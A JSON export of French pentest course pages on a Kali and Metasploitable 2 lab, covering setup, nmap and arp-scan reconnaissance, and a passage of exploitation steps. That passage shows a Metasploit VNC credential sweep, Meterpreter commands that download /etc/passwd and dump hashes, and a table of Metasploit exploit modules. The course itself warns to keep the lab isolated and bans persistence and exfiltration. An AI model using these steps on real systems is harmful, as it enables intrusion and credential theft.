172.16.211.129 LHOST =\u0026gt; 172.16.211.129 msf auxiliary(scanner/vnc/vnc_login) \u0026gt; run [*] 172.16.211.128:5900 - 172.16.211.128:5900 - Starting VNC login sweep [!] 172.16.211.128:5900 - No active DB -- Credential data will not be saved! [+] 172.16.211.128:5900 - 172.16.211.128:5900 - Login Successful: :password [*] 172.16.211.128:5900 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Lancer vncviewer avec le mot de passe password trouvé à l’étape 1 └─$ vncviewer 172.16.211.128:5900 Connected to RFB server, using protocol version 3.3 Performing standard VNC authentication Password: Authentication successful Desktop name \u0026#34;root\u0026#39;s X desktop (metasploitable:0)\u0026#34; VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 La fenêtre du bureau distant s\u0026rsquo;ouvre. Lancer la collecte des preuves avec par exemple getuid, et sysinfo 5. Post-exploitation (après foothold) # Référentiel détaillé : Post-exploit\nActions autorisées en lab (phase exploitation) vs interdites sans RoE :\nAction Autorisé lab cours Outils / commandes Preuve identité Oui id, whoami, hostname, screenshot Info système Oui uname -a, ifconfig, sysinfo (Meterpreter) Enum locale légère Oui ps aux, cat /etc/passwd Hashdump Oui si root (démo) Meterpreter hashdump Persistance (cron, backdoor) Non — Pivot vers autre réseau Non — Exfiltration données réelles Non — 5.1 Meterpreter — commandes utiles # sysinfo getuid shell upload /path/local /path/remote download /etc/passwd meterpreter \u0026gt; download /etc/passwd [*] Downloading: /etc/passwd -\u0026gt; /home/kali/passwd [*] Downloaded 1.54 KiB of 1.54 KiB (100.0%): /etc/passwd -\u0026gt; /home/kali/passwd [*] Completed : /etc/passwd -\u0026gt; /home/kali/passwd hashdump screenshot 5.2 Privilège # Sur MS2, de nombreux exploits donnent root immédiatement (vsFTPd, Samba, distcc, 1524). Sinon : enum sudo -l, SUID, kernels exploit (hors scope sauf cours avancé).\n6. Tableau synthèse — exploitations MS2 (référence TP) # Priorité Service Port Type Module / méthode MSF ou manuel 1 vsFTPd 2.3.4 21 RCE exploit/unix/ftp/vsftpd_234_backdoor 1 Samba 445 RCE exploit/multi/samba/usermap_script 3 Java RMI 1099 RCE java_rmi_server (selon scan) 3 VNC / X11 5900 / 6000 Accès login / x11-access Toujours croiser avec votre rapport OpenVAS/Nessus : versions et faux positifs. 7. Suite de la démarche # Phase actuelle : Exploitation — footholds obtenus, sessions MSF et preuves id / sysinfo collectées.\n[✓] Mise en place → [✓] Reconnaissance → [✓] Scan vulns → [●] Exploitation → [ ] Post-exploit → [ ] Findings → [ ] Rapport Étape suivante : Post-exploit minimal — preuves reproductibles, puis fiche finding par exploit.\n","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/metasploitable2/exploit/","section":"Learning","summary":"","title":"Exploit","type":"learning"},{"content":" Reconnaissance sur Metasploitable 2 # La reconnaissance est la collecte d\u0026rsquo;informations sans exploitation : pas de shell, d\u0026rsquo;injection, de modification de données\n1. Typologie de la reconnaissance # Type Touche la cible ? Exemples sur MS2 (lab) Passive Non (ou indirect) OSINT domaine fictif, lecture doc fournie, nmap --script broadcast limité Active légère Oui, faible bruit ping, arp-scan, nmap -sn Active standard Oui Scan ports TCP/UDP, bannières, scripts NSE Active approfondie Oui, bruyant nmap -p-, enum SMB/NFS, fuzzing web, bruteforce comptes (à encadrer) Dans le cadre de ce module, on fait la différence entre\nReconnaissance → cartographier ports, services, versions, configs exposées. Scan de vulnérabilités → corrélation CVE/plugins (OpenVAS, Nessus). 2. Ordre recommandé (parcours TP) # Vérif lab (ping) → Découverte L2 (ARP / netdiscover) → Découverte L3 (nmap -sn, traceroute) → Scan ports TCP puis UDP ciblé → Bannières \u0026amp; versions (nmap -sV, -sC) → Énumération par service (SNMP, SMB, NFS, HTTP…) → Corrélation \u0026amp; livrable (tableau + priorités pour le scan / l’exploitation) 3. Reconnaissance réseau (couches 2–4) # 3.1 Reconnaissance niveau 2 # Utiliser l\u0026rsquo;outil arp-scan pour scanner le niveau 2 (les machines sur le même réseau)\n└─$ sudo arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:5a:e8:22, IPv4: 172.16.211.129 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 172.16.211.1 00:50:56:c0:00:08 (Unknown) 172.16.211.2 00:50:56:f0:4b:17 (Unknown) 172.16.211.128 00:0c:29:de:c8:07 (Unknown) 172.16.211.254 00:50:56:e0:5f:3b (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.857 seconds (137.86 hosts/sec). 4 responded 3.2 Reconnaissance niveau 3 \u0026amp; 4 # La couche 3 correspond à la reconnaissance IP, et la 4 à celle des ports\nLa première étape consiste à faire une reconnaissance par ping. Utiliser nmap -sn: Ping Scan - disable port scan.\n└─$ nmap -sn 172.16.211.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-09 17:20 -0400 Nmap scan report for 172.16.211.1 Host is up (0.00029s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 172.16.211.2 Host is up (0.00019s latency). MAC Address: 00:50:56:F0:4B:17 (VMware) Nmap scan report for 172.16.211.128 Host is up (0.000068s latency). MAC Address: 00:0C:29:DE:C8:07 (VMware) Nmap scan report for 172.16.211.254 Host is up (0.00021s latency). MAC Address: 00:50:56:E0:5F:3B (VMware) Nmap scan report for 172.16.211.129 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 4.44 seconds L\u0026rsquo;adresse 172.16.211.128 est identifiée\nUne reconnaissance plus poussée, des ports ouverts, est réalisée avec nmap -sSU @IP\nsS : TCP Syn sU : UDP ┌──(kali㉿kali)-[~] └─$ nmap -sSU 172.16.211.128 Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-09 17:26 -0400 Host is up (0.00086s latency). Not shown: 993 closed udp ports (port-unreach), 977 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown 53/udp open domain 68/udp open|filtered dhcpc 69/udp open|filtered tftp 111/udp open rpcbind 137/udp open netbios-ns 138/udp open|filtered netbios-dgm 2049/udp open nfs MAC Address: 00:0C:29:DE:C8:07 (VMware) Nmap done: 1 IP address (1 host up) scanned in 1028.74 seconds 3.3 Première analyse des services # Netcat peut être utilisé pour obtenir les détails d\u0026rsquo;un service écoutant derrière un port\nAnalyse du port ftp └─$ nc 172.16.211.128 21 220 (vsFTPd 2.3.4) Analyse du port ssh └─$ nc 172.16.211.128 22 SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 3.4 Reconnaissance avancée # Voici une commande plus complète pour la reconnaissance\nnmap -sV pour l\u0026rsquo;identification des versions └─$ sudo nmap -sV 172.16.211.128 [sudo] password for kali: Sorry, try again. [sudo] password for kali: Sorry, try again. [sudo] password for kali: Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-09 17:35 -0400 Nmap scan report for 172.16.211.128 Host is up (0.0017s latency). Not shown: 977 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login OpenBSD or Solaris rlogind 514/tcp open tcpwrapped 1099/tcp open java-rmi GNU Classpath grmiregistry 1524/tcp open bindshell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:0C:29:DE:C8:07 (VMware) Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.02 seconds 4. Récapitulatif # À la fin de ce module, rendre un tableau (csv ou md) récapitulant les résultats de la reconnaissance, avec la méthodologie associée\nIP | Port | Proto | Service | Version | Méthode (arp/nmap/snmp/enum4linux/…) | Priorité scan/exploit | Notes Minimum :\n1 ligne par port TCP ou UDP ouvert significatif 5 priorités pour scan/exploit avec justification Captures ou extraits de commandes horodatés 5. Suite de la démarche # Phase actuelle : Reconnaissance — ports, versions et tableau de priorités établis.\n[✓] Mise en place → [✓] Reconnaissance → [●] Scan vulns → [ ] Exploitation → [ ] Post-exploit → [ ] Findings → [ ] Rapport Étape suivante : Scan de vulnérabilités — corréler CVE/plugins et affiner le tableau de priorités.\n","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/metasploitable2/recon/","section":"Learning","summary":"","title":"Recon","type":"learning"},{"content":" Mise en place du lab — Kali + Metasploitable 2 # Voici le guide démarrage pour le module pentest avec Metasploitable.\nL\u0026rsquo;objectif de ce TP est de découvrir et de tester les différentes phases du pentest via l\u0026rsquo;utilisation de Kali et de Metasploitable2. isolé, reproductible et hors production pour la reconnaissance, l’exploitation et la rédaction de livrables.\nImportant : Metasploitable 2 est volontairement vulnérable. Ne jamais l’exposer sur Internet, sur le réseau de l’école sans accord, ni sur votre réseau personnel sans isolation.\n1. Architecture cible du lab # Réseau recommandé : Host-only (VirtualBox) ou LAN segmenté (VMware) — segment 192.168.56.0/24, sans passerelle vers l’extérieur pour la cible.\nCertaines actions seront nécessaires pour mettre à jour Kali. Conservez donc un adaptateur en NAT pour les mises à jour\nMachine Rôle Réseau OS Kali Attaquant (scanner, Metasploit, outils) 172.16.211.129 Kali Linux (VM) Metasploitable 2 Cible vulnérable 172.16.211.128 Ubuntu 8.04 (VM) 2. Téléchargements # Téléchargements (sources officielles ou miroirs cours) :\nVM Lien type Identifiants par défaut Kali Linux https://www.kali.org/get-kali/ (OVA / ISO) Utilisateur kali / mot de passe kali (image récente) Metasploitable 2 https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ Utilisateur msfadmin / mot de passe msfadmin 3. Préparation de l\u0026rsquo;environnement # Créer un réseau dédié sur votre hyperviseur (optionnel) Importer Kali Importer Metasploitable2 4. Test de l\u0026rsquo;environnement # Se connecter à Metasploitable2 Vérifier et notter l\u0026rsquo;adresse IP ifconfig [...] inetaddr : 172.16.211.128 [...] Se connecter à Kali Vérifier et noter l\u0026rsquo;adresse IP iconfig [...] inetaddr : 172.16.211.129 [...] Tester un ping vers Metasploitable2 ┌──(kali㉿kali)-[~] └─$ ping 172.16.211.128 PING 172.16.211.128 (172.16.211.128) 56(84) bytes of data. 64 bytes from 172.16.211.128: icmp_seq=1 ttl=64 time=0.837 ms 64 bytes from 172.16.211.128: icmp_seq=2 ttl=64 time=0.421 ms Lorsque Kali arrive à joindre Metasploitable2, le lab est prêt.\n5. Personnalisation de Kali # Mettre à jour Kali apt get update apt get upgrade Gérer le problème de curseur invisible (VMWare Workstation) Sélectionner la VM Cliquer sur Manage \\ Change Hardware Compatibility Wizard Dans l\u0026rsquo;assistant, sélectionner Workstation 25H2 or later, puis Alter this virtual machine Activer le démarrage automatique de la brique réseau Sur Manjaro, post-installation, la brique réseau est désactivée Constater en vérifiant l\u0026rsquo;état du service (Disabled) sudo systemctl status vmware-networks.service  ✔ ○ vmware-networks.service - VMware Networks Loaded: loaded (/usr/lib/systemd/system/vmware-networks.service; disabled;\u0026gt; Active: inactive (dead) Reconfigurer\nsudo systemctl enable vmware-networks.service sudo systemctl start vmware-networks.service Vérifier\nsudo systemctl status vmware-networks.service  ✔ ● vmware-networks.service - VMware Networks Loaded: loaded (/usr/lib/systemd/system/vmware-networks.service; enabled; \u0026gt; Active: active (running) since Wed 2026-06-10 07:36:57 CEST; 7s ago Invocation: aa6f2d7d9efa4300b5c03204532df250 Process: 9213 ExecStartPre=/sbin/modprobe vmnet (code=exited, status=0/SUCC\u0026gt; Process: 9214 ExecStart=/usr/bin/vmware-networks --start (code=exited, stat\u0026gt; Tasks: 6 (limit: 38044) Memory: 11.6M (peak: 12.9M) CPU: 65ms CGroup: /system.slice/vmware-networks.service ├─9234 /usr/bin/vmnet-bridge -s 6 -d /var/run/vmnet-bridge-0.pid -\u0026gt; ├─9242 /usr/bin/vmnet-netifup -s 6 -d /var/run/vmnet-netifup-vmnet\u0026gt; ├─9248 /usr/bin/vmnet-dhcpd -s 6 -cf /etc/vmware/vmnet1/dhcpd/dhcp\u0026gt; ├─9252 /usr/bin/vmnet-natd -s 6 -m /etc/vmware/vmnet8/nat.mac -c /\u0026gt; ├─9254 /usr/bin/vmnet-netifup -s 6 -d /var/run/vmnet-netifup-vmnet\u0026gt; └─9260 /usr/bin/vmnet-dhcpd -s 6 -cf /etc/vmware/vmnet8/dhcpd/dhcp\u0026gt; Activer le promiscuous mode\nThe virtual machine\u0026rsquo;s operating system has attempted to enable promiscuous mode on adapter \u0026lsquo;Ethernet0\u0026rsquo;. This is not allowed for security reasons. Please go to the Web page \u0026ldquo;http://vmware.com/info?id=161\" for help enabling promiscuous mode in the virtual machine.\nsudo groupadd vmwaregroup sudo usermod -aG vmwaregroup $USER sudo chgrp vmwaregroup /dev/vmnet0 sudo chgrp vmwaregroup /dev/vmnet8 sudo chmod g+rw /dev/vmnet0 sudo chmod g+rw /dev/vmnet8 Log out and back in afterward.\n6. Avant de continuer # Prendre un snapshot de la VM Kali Prendre un snapshot de la VM Metasploitable2 7. Suite de la démarche # Phase actuelle : Mise en place du lab — Kali et Metasploitable 2 opérationnels, réseau test isolé.\n[✓] Mise en place → [●] Reconnaissance → [ ] Scan vulns → [ ] Exploitation → [ ] Post-exploit → [ ] Findings → [ ] Rapport Étape suivante : Reconnaissance — cartographier ports et services sans exploitation.\n","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/metasploitable2/get-started/","section":"Learning","summary":"","title":"Get Started","type":"learning"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","externalUrl":null,"permalink":"/study-cases/","section":"Study-Cases","summary":"","title":"Study-Cases","type":"study-cases"},{"content":"","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"}]